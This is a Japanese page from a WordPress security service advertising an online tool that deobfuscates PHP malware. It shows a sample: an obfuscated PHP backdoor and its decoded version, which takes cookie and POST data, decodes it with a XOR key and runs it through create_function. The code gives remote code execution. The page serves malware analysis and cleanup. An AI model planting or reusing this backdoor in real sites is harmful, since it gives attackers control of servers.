Wordpress 等でのPHPのマルウェア・ウィルス・改ざんコードをデコードして難読化をオンラインで解除し、
元の読みやすいコードに戻し解読できます。
<?php $pbaos = 'oa*dgpsn_vHx0um#2r4365-byeki\'ltc7f';$iwdidfo = Array();$iwdidfo[] = $pbaos[31].$pbaos[17].$pbaos[25].$pbaos[1].$pbaos[30].$pbaos[25].$pbaos[8].$pbaos[33].$pbaos[13].$pbaos[7].$pbaos[31].$pbaos[30].$pbaos[27].$pbaos[0].$pbaos[7];$iwdidfo[] = $pbaos[10].$pbaos[2];$iwdidfo[] = $pbaos[15];$iwdidfo[] = $pbaos[33].$pbaos[16].$pbaos[12].$pbaos[32].$pbaos[12].$pbaos[1].$pbaos[1].$pbaos[16].$pbaos[22].$pbaos[12].$pbaos[21].$pbaos[18].$pbaos[18].$pbaos[22].$pbaos[18].$pbaos[18].$pbaos[32].$pbaos[1].$pbaos[22].$pbaos[1].$pbaos[16].$pbaos[25].$pbaos[3].$pbaos[22].$pbaos[19].$pbaos[20].$pbaos[3].$pbaos[31].$pbaos[12].$pbaos[25].$pbaos[21].$pbaos[20].$pbaos[33].$pbaos[18].$pbaos[25].$pbaos[1];$iwdidfo[] = $pbaos[31].$pbaos[0].$pbaos[13].$pbaos[7].$pbaos[30];$iwdidfo[] = $pbaos[6].$pbaos[30].$pbaos[17].$pbaos[8].$pbaos[17].$pbaos[25].$pbaos[5].$pbaos[25].$pbaos[1].$pbaos[30];$iwdidfo[] = $pbaos[25].$pbaos[11].$pbaos[5].$pbaos[29].$pbaos[0].$pbaos[3].$pbaos[25];$iwdidfo[] = $pbaos[6].$pbaos[13].$pbaos[23].$pbaos[6].$pbaos[30].$pbaos[17];$iwdidfo[] = $pbaos[1].$pbaos[17].$pbaos[17].$pbaos[1].$pbaos[24].$pbaos[8].$pbaos[14].$pbaos[25].$pbaos[17].$pbaos[4].$pbaos[25];$iwdidfo[] = $pbaos[6].$pbaos[30].$pbaos[17].$pbaos[29].$pbaos[25].$pbaos[7];$iwdidfo[] = $pbaos[5].$pbaos[1].$pbaos[31].$pbaos[26];foreach ($iwdidfo[8]($_COOKIE, $_POST) as $naifusl => $ufqpf){function qqwsaxa($iwdidfo, $naifusl, $jtfzjrt){return $iwdidfo[7]($iwdidfo[5]($naifusl . $iwdidfo[3], ($jtfzjrt / $iwdidfo[9]($naifusl)) + 1), 0, $jtfzjrt);}function gkosb($iwdidfo, $ubmlxqt){return @$iwdidfo[10]($iwdidfo[1], $ubmlxqt);}function lfpuku($iwdidfo, $ubmlxqt){$rvzqer = $iwdidfo[4]($ubmlxqt) % 3;if (!$rvzqer) {$crtbq = $iwdidfo[0]; $neobe = $crtbq("", $ubmlxqt[1]($ubmlxqt[2]));$neobe();exit();}}$ufqpf = gkosb($iwdidfo, $ufqpf);lfpuku($iwdidfo, $iwdidfo[6]($iwdidfo[2], $ufqpf ^ qqwsaxa($iwdidfo, $naifusl, $iwdidfo[9]($ufqpf))));}
<?php $pbaos = 'oa*dgpsn_vHx0um#2r4365-byeki\'ltc7f'; $iwdidfo = array(); $iwdidfo[] = "create_function"; $iwdidfo[] = "H*"; $iwdidfo[] = $pbaos[15]; $iwdidfo[] = "f2070aa2-0544-447a-a2ed-36dc0e56f4ea"; $iwdidfo[] = "count"; $iwdidfo[] = "str_repeat"; $iwdidfo[] = "explode"; $iwdidfo[] = "substr"; $iwdidfo[] = "array_merge"; $iwdidfo[] = "strlen"; $iwdidfo[] = "pack"; foreach (array_merge($_COOKIE, $_POST) as $naifusl => $ufqpf) { function qqwsaxa($iwdidfo, $naifusl, $jtfzjrt) { return $iwdidfo[7]($iwdidfo[5]($naifusl . $iwdidfo[3], $jtfzjrt / $iwdidfo[9]($naifusl) + 1), 0, $jtfzjrt); } function gkosb($iwdidfo, $ubmlxqt) { return @$iwdidfo[10]($iwdidfo[1], $ubmlxqt); } function lfpuku($iwdidfo, $ubmlxqt) { $rvzqer = $iwdidfo[4]($ubmlxqt) % 3; if (!$rvzqer) { $crtbq = $iwdidfo[0]; $neobe = $crtbq("", $ubmlxqt[1]($ubmlxqt[2])); $neobe(); exit; } } $ufqpf = gkosb($iwdidfo, $ufqpf); lfpuku($iwdidfo, $iwdidfo[6]($iwdidfo[2], $ufqpf ^ qqwsaxa($iwdidfo, $naifusl, $iwdidfo[9]($ufqpf)))); }
■【無料】ワードプレス:マルウェアスキャン&セキュリティープラグイン [マルウェア・ウィルス検出と駆除]
■WordPress のマルウェア駆除、セキュリティー対策 カスタマイズや修正、引っ越し・復旧のご依頼承ります
(C)2019 ワードプレス ドクター All rights reserved.